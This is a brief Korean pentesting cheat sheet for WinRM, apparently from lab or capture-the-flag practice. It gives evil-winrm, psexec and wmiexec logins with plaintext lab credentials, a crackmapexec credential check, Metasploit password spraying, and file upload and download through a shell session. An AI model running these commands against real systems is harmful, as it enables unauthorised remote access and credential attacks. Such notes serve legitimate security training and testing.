5985, 5986 - Winrm

// Winrm ์›๊ฒฉ์ ‘์†
evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
psexec.py 'administrator:!R3m0te!@10.10.10.180'
wmiexec.py 'administrator:!R3m0te!@10.10.10.180'
// Winrm ์ ‘์†๋˜๋Š”์ง€ ํ…Œ์ŠคํŠธ
crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
  • ๋งŒ์•ฝ smb ๊ณ„์ •๊ณผ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์–ป์—ˆ๋‹ค๋ฉด winrm ์ ‘์†์‹œ๋„๋ฅผ ํ•œ๋ฒˆ์€ ํ•ด๋ณด๋Š” ๊ฒƒ์ด ์ข‹๋‹ค

// Winrm ๋น„๋ฐ€๋ฒˆํ˜ธ ์Šคํ”„๋ ˆ์ด
msf5 auxiliary(scanner/winrm/winrm_login) run
[Set RHOST, RPORT, USERNAME, PASSWORD]

//ํŒŒ์ผ ์—…๋กœ๋“œ
upload ์—…๋กœ๋“œ ํ•  ํŒŒ์ผuse 

//ํŒŒ์ผ ๋‹ค์šด๋กœ๋“œ
download ํŒŒ์ผ ์ด๋ฆ„(/opt/evil-winrm์— ๋‹ค์šด๋ฐ›์€ ํด๋” ์ƒ์„ฑ)

Last updated